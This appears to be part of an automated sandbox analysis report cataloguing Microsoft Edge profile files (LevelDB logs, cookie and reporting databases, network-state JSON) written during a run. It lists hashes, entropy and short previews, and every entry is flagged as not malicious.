                                                                                                                                                                                                                                                SHA-256:7AA3175F847D2153E966ED8F4EF11EB7BDC8D30D4C0F21E260B93C9514217CBD
                                                                                                                                                                                                                                                SHA-512:8281C8D919B4A902550F7D80457888E0E3F6646F94E1D43FF96E4348275B123475B951040F3A7D157A01AB78A07C191E173C12EA52FCD9E1067BB6AD735346B8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:30.777 450 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/16-11:07:30.777 450 Recovering log #3.2024/12/16-11:07:30.778 450 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1470
                                                                                                                                                                                                                                                Entropy (8bit):5.669307279694029
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:5TZWEUlHDm1lwmuEkjoek5tXZim+W33yV03y1x4/HMyENW/NRdgFHHmN2cfJ3Xo1:5TZNCm7wmuE4lstXZim9HyV03Sx4/syI
                                                                                                                                                                                                                                                MD5:0369F2DEF6026312D1D89FECCF06880C
                                                                                                                                                                                                                                                SHA1:8017D15E82D66726031EDBA4880086C28761574F
                                                                                                                                                                                                                                                SHA-256:F5BAD8AC6314142DF41CE03356E2A6CB368FDDADA03502C7A15F3BF8DA12E494
                                                                                                                                                                                                                                                SHA-512:C296BC67548E2E7BEDD7E4DE7AD2D59D79781F92F7CCB5E1AEC7321353FD481B7E1A2D5A93FCACF3EB71F65E563CEC31F183D3AE32BB93F0B404D97653676CB4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:;..J{................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":902}.!_https://ntp.msn.com..LastKnownPV..1734365264497.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734365265412.._https://ntp.msn.com..MUID!.360240197938679F2CDC554E78216658.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734365264571,"schedule":[-1,33,-1,-1,-1,16,18],"scheduleFixed":[-1,33,-1,-1,-1,16,18],"simpleSchedule":[39,35,34,36,9,19,11]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734365264465.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241213.442"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                Entropy (8bit):5.141919525052944
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/Ri+q2PcNwi23oH+Tcwt8a2jMGIFUt8O/TWZmw+O/AIVkwOcNwi23oH+Tcwt8as:7/s+vLZYeb8EFUt8O/K/+O/jV54ZYebw
                                                                                                                                                                                                                                                MD5:15B26349AE87E1D959E931DA8AB3677D
                                                                                                                                                                                                                                                SHA1:5805F907446712A6B026F991C0F85EFF7B2AD221
                                                                                                                                                                                                                                                SHA-256:B59FD437A5F0AFA1E64A2BB5B948C027CBBECFE5B7098FEF161B137658994D7D
                                                                                                                                                                                                                                                SHA-512:A3D264369A1353FE509ED59DE4B49DA437E24131ED83EBE795F9A6BBB558F3C5B351D45BC7A3E568F11DF612366A24A04E69A5A47B7DC1D7A7799546D42567BD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.114 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/16-11:07:27.116 1b0c Recovering log #3.2024/12/16-11:07:27.119 1b0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                Entropy (8bit):5.141919525052944
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/Ri+q2PcNwi23oH+Tcwt8a2jMGIFUt8O/TWZmw+O/AIVkwOcNwi23oH+Tcwt8as:7/s+vLZYeb8EFUt8O/K/+O/jV54ZYebw
                                                                                                                                                                                                                                                MD5:15B26349AE87E1D959E931DA8AB3677D
                                                                                                                                                                                                                                                SHA1:5805F907446712A6B026F991C0F85EFF7B2AD221
                                                                                                                                                                                                                                                SHA-256:B59FD437A5F0AFA1E64A2BB5B948C027CBBECFE5B7098FEF161B137658994D7D
                                                                                                                                                                                                                                                SHA-512:A3D264369A1353FE509ED59DE4B49DA437E24131ED83EBE795F9A6BBB558F3C5B351D45BC7A3E568F11DF612366A24A04E69A5A47B7DC1D7A7799546D42567BD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.114 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/16-11:07:27.116 1b0c Recovering log #3.2024/12/16-11:07:27.119 1b0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):2.7730312980221328
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:tT8p+SFvJIyEAjQqUGxwtLCIfUePKPINuXcf0L/ZJVb:V8ptREAjZUGxwAIfmINuXI0LhJVb
                                                                                                                                                                                                                                                MD5:A9271E5B452E0D577A9785B39BBA398B
                                                                                                                                                                                                                                                SHA1:15AB9D084942F43DF5F6FBF4027BE8FC29E56656
                                                                                                                                                                                                                                                SHA-256:7B461DBB5FC2AE8DDE2AC672EF18AD28C8826272145A308633805049367331C2
                                                                                                                                                                                                                                                SHA-512:C1EE3F2EF3CD42763C36009B37952DFB2D24BFD6E80526F6AE8011CD2E76BA15B9B82B5BFDD11DAA6BAB7E99B68774BBF215577DDAE6A0DFABD562BF9991F781
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1618
                                                                                                                                                                                                                                                Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF39a1e.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1618
                                                                                                                                                                                                                                                Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                Entropy (8bit):1.2784336308670714
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSlAWg:uIEumQv8m1ccnvSX+DJii7MM1a
                                                                                                                                                                                                                                                MD5:31DAA2610D89821A5D1ECA55A7532C23
                                                                                                                                                                                                                                                SHA1:C60CDE590AE0B22519FFE592AEF762E08285691E
                                                                                                                                                                                                                                                SHA-256:DF14A9AA78680C2D616CDEAF12C9086438111AF8C9A2813F409034F5DCF7CF09
                                                                                                                                                                                                                                                SHA-512:3AAD920B8DAD7339DC294E6EB1B5C707200DC8024053FD067802F11B752F831DDAD64113312D8CC61E368D1822B6625F0126B30749412BA90319C1D09BE9E4FC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF28a54.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2a185.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a182e57f-aeaa-4c16-b525-e2b3cb87c433.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1618
                                                                                                                                                                                                                                                Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a300d69f-0f50-4d70-8093-81196e19bdde.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\abde2492-2333-44ac-93de-b8b241d5b598.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d862afe4-f2f5-4ea2-b44a-d0ab0a6ecbe8.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\df01a95a-2dd2-4d82-afe5-faa695825867.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):1768
                                                                                                                                                                                                                                                Entropy (8bit):5.296494009914711
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YcCpfgCzsYtsCfcKs0leeBkBRsF1CgHYYhbyD0:F2fXlvkeBkBUT5hn
                                                                                                                                                                                                                                                MD5:77EB241FB642EB6E04FD5B6B163D587D
                                                                                                                                                                                                                                                SHA1:C473C0FCC5EDA444D6BA9193B9C3B4DE6B18FCD8
                                                                                                                                                                                                                                                SHA-256:5192B94163C514B6D487201A00F8C5191B0AF7D9A2518005581C8CFEE0B523BC
                                                                                                                                                                                                                                                SHA-512:FA18BBF54DCF998660C147C4DD31809DB6A8614BBDE2CD426801996205544D3A6D2CD9D0594984E877306EAB6561933E7DA1FDDEC788F936AF8E575CEA651035
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381430851389649","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381430855621307","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378932458430701","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f82ceb11-de35-4634-9084-1a05e95412db.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
